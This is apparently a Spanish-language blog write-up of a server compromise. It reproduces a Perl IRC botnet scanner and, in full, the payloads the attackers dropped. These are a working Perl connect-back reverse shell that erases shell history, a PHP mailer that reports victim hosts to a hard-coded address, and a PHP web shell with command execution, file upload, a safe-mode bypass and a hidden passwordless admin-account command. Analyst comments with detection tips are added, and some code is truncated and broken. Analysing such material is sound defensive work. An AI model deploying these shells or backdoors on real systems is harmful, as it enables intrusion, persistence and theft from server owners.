# visible anchor text ($2) is used as the host when it contains a dot and no
# markup or spaces. Nothing is appended on the no-results path.
sub ybypass () { # GoodSearch uses the same search type of Yahoo
my @lst;
my $key = $_[0];
my $name = $_[1];
my $ybytest = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($key)."&page=1&osmax=16");
my $res = query($ybytest);
if ($res =~ /Your search did not yield any results/){
return @lst;
}
else {
for $p(1..50){
my $ybylink = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($key)."&page=".$p."&osmax=16");
my $rek = query($ybylink);
while ($rek =~ m/href=\"(.+?)\">(.+?)<\/a>/g) {
my $tsite = $2;
if (($tsite =~ /\./) && ($tsite !~ /<|>| /)){
my @grep = links($tsite);
open( $filez, ">>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
}
# it.ask.com scraper: canary query (Italian "no results" text), then 21 pages;
# every href="http://…" not mentioning ask/wikipedia is expanded and appended.
# The qid value in the page URL is a fixed session token copied from a browser.
sub ask () {
my $key = $_[0];
my $name = $_[1];
my @lst;
my $askt = ("http://it.ask.com/web?q=".key($key)."&qsrc=1&o=312&l=dir&dm=all");
my $asktest = query($askt);
if ($asktest =~ /non ha prodotto alcun risultato/) {
return @lst;
}
else {
for ($p=0;$p<=20;$p++){
my $asklink = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=612B74535B00F6CA7678625658F9B98C&dm=all&page=".$p);
my $re = query($asklink);
while($re =~ m/href=\"http:\/\/(.+?)\"/g){
my $tsite = $1;
if ($tsite !~ /ask|wikipedia/){
my @grep = links($tsite);
open( $filez, ">>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
}
# search.aol.com scraper: canary query, then 100 pages.
# NOTE(review): the `while` regex is split across two lines and its first
# part was lost in extraction; the capture it relies on is not visible here.
sub aol () {
my $key = $_[0];
my $name = $_[1];
my @lst;
my $aolt = ("http://search.aol.com/aol/search?invocationType=topsearchbox.search&query=".key($key));
my $atest = query($aolt);
if ($atest =~ /returned no results.<\/h3>/) {
return @lst;
}
else {
for ($p=1;$p<=100;$p++){
my $aollink = ("http://search.aol.com/aol/search?query=".key($key)."&page=".$p."&nt=SG2&do=Search&invocationType=comsearch30&clickstreamid=3154480101243260576");
my $re = query($aollink);
while($re =~ m/
(.+?)\n-/g) {
my $tsite = $1;
my @grep = links($tsite);
open( $filez, ">>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
return @lst;
}
}
# search.dmoz.org scraper: derives a page bound $max from the "of N)" total in
# the first response, then walks result offsets while a "Next" link exists.
# NOTE(review): the inner `while` line lost most of its text in extraction
# (the `open(` that must have preceded `>>", $name )` is gone), so the loop
# body as printed is not what ran. Also note `my $to--;` declares a fresh
# lexical shadowing the quotient computed above, so that branch works on
# undef - 1 rather than on the result count.
sub dmoz () {
my $key = $_[0];
my $name = $_[1];
my @lst;
my $dmtest = ("http://search.dmoz.org/cgi-bin/search?search=".key($key));
my $dmq = query($dmtest);
if ($dmq =~ /No Open Directory Project<\/a><\/b> results found/){
return @lst;
}
elsif ($dmq =~ /of (.+?)\)
/){
my $ftot = $1;
# $max and $uik are package globals (no `my`).
if ($ftot <= 20) {
$max = 1;
}
else {
my $to = $ftot / 20;
# Unescaped `.` here matches any character, not only a decimal point.
if ($to =~ /(.+).(.+?)/){
$uik = $1 * 20;
$max = $uik +1;
}
elsif ($to =~ /[0-9]/) {
my $to--;
my $rej = $to * 20;
$max = $rej +1;
}
}
}
for ($p=1;$p<=$max;$p += 20){
my $dmozlink = ("http://search.dmoz.org/cgi-bin/search?search=".key($key)."&utf8=1&locale=it_it&start=".$p);
my $re = query($dmozlink);
if ($re =~ /\">Next<\/a>/) {
while($re =~ m/>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
}
}
return @lst;
}
# suche.web.de scraper: 50 pages; every href="http://…"> that is not an
# internal search link is expanded with links() and appended to $name.
# $p is a package global (no `my` on the loop variable).
sub webde () {
my $key = $_[0];
my $name = $_[1];
my @lst;
for $p(1..50){
my $webdelink = ("http://suche.web.de/search/web/?pageIndex=".$p."&su=".key($key)."&y=0&x=0&mc=suche@web@navigation@zahlen.suche@web");
my $re = query($webdelink);
while($re =~ m/href=\"http:\/\/(.+?)\">/g) {
my $tsite = $1;
if ($tsite !~ /\/search\/web|web.de|\" class=\"neww\"/){
my @grep = links($tsite);
open( $filez, ">>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
# einet.net scraper: reads the page count from "Page 1 of N" in the first
# response and then walks every page. Nothing is fetched when that header is
# absent. NOTE(review): the inner `while` pattern appears truncated at its
# start in this listing.
sub einet () {
my $key = $_[0];
my $name = $_[1];
my @lst;
my $einetest = ("http://www.einet.net/view/search.gst?p=1&k=".key($key)."&s=0&submit=Search");
my $einet3st = query($einetest);
if ($einet3st =~ /Page 1 of\s+(.+?)<\/span>/){
my $totz = $1;
for ($p=1;$p<=$totz;$p++){
my $einetlink = ("http://www.einet.net/view/search.gst?p=".$p."&k=".key($key)."&s=0&submit=Search");
my $re = query($einetlink);
while($re =~ m/\s+(.+?)<\/span>/g) {
my $tsite = $1;
my @grep = links($tsite);
open( $filez, ">>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
# ricerca.alice.it (Virgilio) scraper: canary query, then 81 offsets of 10.
# Unlike the other engines it collects raw hits into the package global @sgrep
# and hands them to fprint($name, …), which is not defined anywhere in this
# listing. The early-return `@list` is also the package global, not the lexical
# declared later. NOTE(review): the `m//g` pattern is empty — lost in extraction.
sub virgilio() {
my $dork = $_[0];
my $name = $_[1];
my $vtest = ("http://ricerca.alice.it/ricerca?qs=".key($dork)."&Cerca=&lr=");
my $re = query($vtest);
if ($re =~ /Controlla che tutte le parole siano state digitate correttamente<\/span>/) {
return @list;
}
else {
for ($i = 0;$i <= 800; $i += 10) {
my $vlink = ("http://ricerca.alice.it/ricerca?qs=".key($dork)."&filter=1&site=&lr=&hits=10&offset=".$i);
my $re = query($vlink);
while($re =~ m//g) {
my $h = $1;
if ($h !~ /microsoft|wikipedia/){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}
# search.abacho.com scraper: canary query, then 201 offsets of 10; collects
# every target="_blank">http://… hit into the package global @sgrep and calls
# fprint($name, …), which is not defined in this listing.
sub abacho() {
my $dork = $_[0];
my $name = $_[1];
my $atest = ("http://search.abacho.com/it/abacho.it/index.cfm?q=".key($dork)."&country=it&x=0&y=0");
my $re = query($atest);
if ($re =~ /We didn't find any results matching your query/) {
return @list;
}
else {
for ($i = 0;$i <= 2000; $i += 10) {
my $alink = ("http://search.abacho.com/it/abacho.it/index.cfm?offset=".$i."&poffset=0&StartCounter=".$i."&q=".key($dork)."&a=&b=&country=it&page=&d_html=&d_pdf=&d_msdoc=&d_xls=&d_ppt=&mesearchkey=&cluster=&coop=");
my $re = query($alink);
while ($re =~ m/target=\"_blank\">http:\/\/(.+?)<\/a>/g) {
my $h = $1;
push(@sgrep,$h);
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}
# Deletes a result file by shelling out to `rm`. The name is interpolated into
# a shell command line; within this file it is always the "<n><letter>siti.txt"
# string built in irc(), but the construct is a shell-injection sink for any
# other input (Perl's unlink() would do the same job without a shell).
sub remove() {
my $file = $_[0];
system("rm $file");
}
# Strips a leading "allintexxt:" prefix from the dork string and announces it
# on the channel. $dork is a package global here (no `my`), so the caller's
# value is also left in that global.
sub clean () {
$dork = $_[0];
if ( $dork =~ /allintexxt:/ ) {
writ1("Cleaning Dork from Google Search Keys!");
$dork =~ s/^allintexxt://g;
}
return $dork;
}
# Minimal query-string encoder for the dork: space becomes "+" and the
# characters : / & " , \ become their %XX forms. Only these seven are touched;
# everything else (including "%") passes through unchanged. Returns the
# encoded copy; the argument itself is not modified.
sub key() {
    my ($dork) = @_;
    my %escape_for = (
        ' '  => '+',
        ':'  => '%3A',
        '/'  => '%2F',
        '&'  => '%26',
        '"'  => '%22',
        ','  => '%2C',
        '\\' => '%5C',
    );
    # One pass is equivalent to the original chain of substitutions because
    # none of the replacement strings contains a character from the set.
    $dork =~ s{([ :/&",\\])}{$escape_for{$1}}g;
    return $dork;
}
# Expands one scraped URL into the three variants the probes are run against:
#   link  - the URL as given,
#   host  - the text up to the first "/" that follows a run of host characters,
#   hdir  - the URL with its last path component removed.
# Each variant gets a trailing "/" and a single pass collapsing "//" into "/".
# Returns the three strings in that order.
sub links() {
    my ($raw) = @_;

    my $hdir = $raw;
    $hdir =~ s{(.*)/[^/]*$}{$1};            # greedy: drop only the last segment

    my $host = $raw;
    $host =~ s{([-a-zA-Z0-9.]+)/.*}{$1};    # unanchored, so a scheme prefix survives

    my @variants = ($raw, $host, $hdir);
    for my $v (@variants) {
        $v .= "/";
        $v =~ s{//}{/}g;                   # single pass: "///" becomes "//", as in the original
    }
    return @variants;
}
# HTTP GET of $_[0] with a User-Agent picked at random from @User_Agent and a
# 4-second timeout. Returns the response body regardless of status (no
# is_success check), so error pages are matched by the callers too. The "3"
# some callers pass as a second argument is ignored. $link is a package global.
sub query() {
$link = $_[0];
my $req = HTTP::Request->new( GET => $link );
my $ua = LWP::UserAgent->new();
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->timeout(4);
my $response = $ua->request($req);
return $response->content;
}
# Returns the fixed pool of User-Agent strings query() rotates through
# (56 entries, all 1990s–2006 era browser identifiers). Kept as a heredoc so
# the list reads as data; one entry per line, order preserved.
sub Agent(){
    my $pool = <<'END_AGENTS';
Microsoft Internet Explorer/4.0b1 (Windows 95)
Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)
Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)
Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)
Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 7.0b; Win32)
Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Microsoft Pocket Internet Explorer/0.6
Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)
MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)
Advanced Browser (http://www.avantbrowser.com)
Avant Browser (http://www.avantbrowser.com)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)
Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)
Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511
Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929
Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox
Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1
Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1
Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2
Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b
Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0
Mozilla/3.0 (OS/2; U)
Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)
Mozilla/4.61 (Macintosh; I; PPC)
Mozilla/4.61 [en] (OS/2; U)
Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)
Mozilla/4.8 [en] (Windows NT 5.0; U)
END_AGENTS
    # split drops the trailing empty field left by the final newline.
    return split /\n/, $pool;
}
# Fetches the probe URL a second time and copies labelled fields from the
# response into the package globals $un, $os, $id1, $free, $used and $all;
# rfi() reads the first three for its channel report.
# NOTE(review): every `m/...\/g` here is unterminated as printed — the closing
# delimiter after `\/` was lost in extraction, so the real patterns are not
# recoverable from this listing.
sub os() {
my $site = $_[0];
my $ret = &query($site);
while ( $ret =~ m/uname -a:(.+?)\/g ) {
$un = $1;
}
while ( $ret =~ m/os:(.+?)\/g ) {
$os = $1;
}
while ( $ret =~ m/id:(.+?)\/g ) {
$id1 = $1;
}
while ( $ret =~ m/free:(.+?)\/g ) {
$free = $1;
}
while ( $ret =~ m/used:(.+?)\/g ) {
$used = $1;
}
while ( $ret =~ m/total:(.+?)\/g ) {
$all = $1;
}
}
# Fetches the CGI follow-up URL and stores the body in the package global
# $un_cgi. Without /m, ^ and $ anchor at the string ends, so the loop matches
# only when the body is a single line; the last match wins.
sub cgi_os() {
my $site = $_[0];
my $re = &query($site);
while ($re =~ m/^(.*)$/g) {
$un_cgi = $1;
}
}
# Collapses runs of "/" in every argument and returns the arguments with
# duplicates removed, first occurrence winning and order preserved.
# The loop variable aliases @_, which aliases the caller's array elements, so
# the slash normalisation is also applied in place to the caller's values
# (exactly as the original did).
sub unici {
    my %seen;
    my @kept;
    for my $entry (@_) {
        $entry =~ s{/+}{/}g;
        push @kept, $entry unless $seen{$entry}++;
    }
    return @kept;
}
# Posts one line to the scan channel ($chan1) over the global IRC socket $c0n.
sub writ1 () {
my $cont = $_[0];
print $c0n "PRIVMSG $chan1 :$cont\n";
}
# Posts one line to the report channel ($chan2) over the global IRC socket $c0n.
sub writ2 () {
my $cont = $_[0];
print $c0n "PRIVMSG $chan2 :$cont\n";
}
# Identical to writ2(); not called anywhere in this listing.
sub priv8 () {
my $cont = $_[0];
print $c0n "PRIVMSG $chan2 :$cont\n";
}
## PRIVATE
## Coded by BitchX and Osirys
Este script está interesante: está hecho para tomar comandos desde IRC, hacer escaneos masivos, infectar más servidores, agregarlos a la botnet y reportarse (me encantaron sobre todo las contraseñas, con las que podríamos tomar control de la botnet nosotros mismos). Así también agregaron y ejecutaron los siguientes scripts:
http://matudesign.com/dh/imagenes/02.txt
#!/usr/bin/perl
# ---------------------------------------------------------------------------
# Analyst notes (added on review; the code below is unchanged).
# This is a "connect-back" shell: it dials out to the [Host] [Port] given on
# the command line, points STDIN/STDOUT/STDERR at that socket, clears the
# shell-history variables for the session and hands the connection to /bin/sh.
# What to look for on a host where this ran:
#   * an outbound TCP connection from a perl process (typically the web-server
#     user, if it was dropped through the bot described above) to an unusual
#     host/port;
#   * a child /bin/sh whose file descriptors 0-2 are a socket
#     (lsof, or /proc/<pid>/fd);
#   * an empty or missing shell history for that session is itself a hint,
#     because HISTFILE/SAVEHIST are unset right before the shell starts.
# How and by whom it was launched is not visible in this file; that has to
# come from the web-server and process logs.
# ---------------------------------------------------------------------------
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';   # the shell that is handed the socket at the very end
$ARGC=@ARGV;           # argument count: array evaluated in scalar context
print "--== ConnectBack Backdoor Shell vs 1.0 by xiP / eu kero comprar meu carroOOOo..!!! ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
# NOTE: "die print ..." prints the message to STDOUT and then dies with
# print's return value (1), so the error text is not part of the die message.
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Olhando o servidor...\n";
print "[*] ConectandO... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
# Dup the socket onto the process's standard streams (">&" duplicates the
# handle), so everything started from here on talks to the remote end.
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by by xiP / eu kero comprar meu carroOOOo..!!! ==-- \n\n";
# Anti-forensics followed by a banner: unsetting HISTFILE/SAVEHIST keeps shells
# that honour those variables from writing a history file; uname/id/pwd are
# then printed for the remote operator.
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
# Interactive /bin/sh with its stdio on the socket; this blocks until the
# remote side closes the shell.
system($system);
#EOF
Ojo con el MAESTRO del system (me pregunto yo para qué hacer tanto show, y qué pasa si no está el command, o peor; eso se ve fuertísimo, pero bueno, no podemos pedir demasiado, jejejejeje).
Y esta preciosura tambien:
// Analyst notes (code unchanged): a "call home" mailer. It builds a message
// from the compromised site's host name and request URI and sends it to a
// hard-coded mailbox, i.e. it tells the operator where the payload ran.
// NOTE(review): the opening <?php tag and whatever preceded "ob_clean(); ?>"
// on the first line appear to have been lost when the page was rendered, so
// this fragment is not runnable exactly as shown.
// Detection: outbound mail from the web-server process to the address below,
// with a subject of the form "<digits> # Vuln Owns", is a direct indicator
// that this payload executed on the host.
ob_clean(); ?>
$cabeceras = "Content-type: text/html\r\n";
$m1=$_SERVER['HTTP_HOST'];      // victim host name ...
$m2=$_SERVER['REQUEST_URI'];    // ... and the path the payload was reached at
$hostn=$_SERVER['HTTP_HOST'];   // same value as $m1
$ran = rand(0,999);
$ran = "$ran$ran";              // random 0-999 value written twice, used as a subject tag
$asunto = "$ran # Vuln Owns";
$arr =array($to,$message);      // $to/$message are never assigned in this fragment; $arr is unused
$msg = "1nb0x1nh4: $m1.$m2 \nHostname: $hostn\n" . " " . '
';
mail("math3us1m@hotmail.com", $asunto, $msg, $cabeceras);
?>
Manda un email a math3us1m@hotmail.com avisandole del hack, mandemosles muchos y muchos correos de hack! jajajaja porque no?
Y para mantener el control usan: http://matudesign.com/dh/imagenes/cmd-shell.txt
--== ?YOUNGEST? Hack Shell==--
OFF"; }
else { $SafeMode = "$SafeMode"; }
// Analyst notes (code unchanged): configuration block of the web shell. The
// three URLs below all point at the same remote "cmds.txt" on a third-party
// host; a web-server process fetching that URL is a usable egress indicator.
// The if/else just above is cut off on the page, so where $SafeMode comes
// from is not visible here.
$btname = 'backtool.txt';
$bt = 'http://www.smashed-radio.com/forum/cmds.txt';
$dc = 'http://www.smashed-radio.com/forum/cmds.txt';
// $newuser holds a Windows batch snippet: it creates a local user "Admin" with
// no password requirement, adds it to Administrators and removes it from
// Users. Where the string is executed is not visible in this fragment; on
// Windows hosts, audit local account creation and changes to the
// Administrators group membership.
$newuser = '@echo off;net user Admin /add /expires:never
/passwordreq:no;net localgroup
"Administrators" /add Admin;net localgroup "Users" /del
Admin';
$bn = 'http://www.smashed-radio.com/forum/cmds.txt';
// Java Script
// NOTE(review): the script the original echo presumably emitted has been
// stripped by the page rendering; only the empty echo survives.
echo "";
// End JavaScript
/* Functions */
// Run $CMDs on the server and return its output. Analyst notes (code
// unchanged): this is the web shell's command-execution primitive; the "cmd"
// action further down passes it the raw cmd= request parameter.
// The fallback chain is mostly dead code: the first if already handles the
// empty-output case, so the three elseif branches repeat a condition that is
// false by construction and can never run. In practice only exec() and, when
// it produced nothing, shell_exec() are ever called, and the return value is
// an array (from exec) or a string (from shell_exec) - callers must cope
// with both.
// Mitigation/detection: list exec, shell_exec, passthru, system and popen in
// php.ini disable_functions, and alert when the web-server process spawns a
// shell.
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs, $CMD[1]);            // output lines are collected into $CMD[1]
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);     // second attempt: whole output as one string
}
elseif (empty($CMD[1])) {        // unreachable: same condition as the if above
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {        // unreachable
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {        // unreachable
$handle = popen($CMDs, 'r');
while(!feof($handle)) {
$CMD[1][] .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
// Analyst notes (code unchanged): working-directory selection. The directory
// is taken straight from the chdir= query parameter with no validation, so
// any path the web-server user can enter is accepted; the default is the
// script's current directory. The status strings are kept verbatim.
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = " Pintu Masuk ke Direktori, OK!";
} else {
$msg = "Error: Gagal masukkan ke folder!";
// NOTE(review): $SCRIPT_NAME is not assigned anywhere in this fragment; it
// looks like a register_globals-era reference - confirm.
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
$chdir = str_replace(chr(92), chr(47), $chdir);   // backslashes -> forward slashes
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .
$_FILES['userfile']['name'])) {
$msg = "{$_FILES['userfile']['name']}, Upload File Berjaya.
";
} else {
$msg = "Error: Upload File Gagal.";
}
}
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "{$newdir}, folder
berhasil dibuat. ";
} else {
$msg = "Error: Pembuatan folder
gagal.";
}
}
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "{$newfile}, berhasil
dibuat! ";
} else {
$msg = "Error: Tak Boleh Buat File!";
}
}
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "{$file}, Berhasil
menghapus arsip (file)!";
} else {
$msg = "Error: Gagal menghapuskan File
(file)!";
}
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "{$file}, Berhasil
menghapus folder!";
} else {
$msg = "Error: Gagal menghapuskan
folder!";
}
}
}
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {
$msg = "Chmod dari {$_GET['file']} berubah
menjadi
$chmod :
Sukses!";
} else {
$msg = 'Error: Gagal mengubah
chmod.';
}
}
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "Archive {$file}
named for {$newname} successfully!";
} else {
$msg = "Error: Gagal menukar File.";
}
}
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "{$file}, disalin
menjadi {$copy}
Berhasil!";
} else {
$msg = "Error: Gagal menyalin {$file} menjadi
{$copy}";
}
}
/* Parte Atualiza 02:48 12/2/2006 */
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd = stripslashes(trim($cmd));
$result_arr = cmd($cmd);
$afim = count($result_arr); $acom = 0; $msg = '';
$msg .= "
Hasil : ".$cmd."
";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "
".@$result_arr[$acom]."
";
$acom++;
}
}
else {
$msg .= "
Error: Gagal Menjalankan perintah.
";
}
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
echo "Loading... module";
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
@dl('php_shmop.dll');
} else {
@dl('shmop.so');
}
}
if (@extension_loaded('shmop')) {
echo "Module: shmop loaded!";
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
$data="\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire
length of
data\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for
deletion."; }
echo passthru("id");
shmop_close($shm_id);
} else { echo "Module: shmop tidak dimuat!"; }
}
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$msg .= "Name: " . zip_entry_name($zip_entry) . "\n";
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) .
"\n";
$msg .= "Compressed Size: " .
zip_entry_compressedsize($zip_entry) . "\n";
$msg .= "Compression Method: " .
zip_entry_compressionmethod($zip_entry) . "\n";
if (zip_entry_open($zip, $zip_entry, "r")) {
echo "File Contents:\n";
$buf = zip_entry_read($zip_entry,
zip_entry_filesize($zip_entry));
echo "$buf\n";
zip_entry_close($zip_entry);
}
echo "\n";
}
zip_close($zip);
}
}
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";
$conteudo = @file_get_contents($filename);
$conteudo = htmlspecialchars($conteudo);
$back = $_SERVER['HTTP_REFERER'];
echo "
Editing {$file} ...
";
echo "
| "; echo " "; echo " | "; echo "
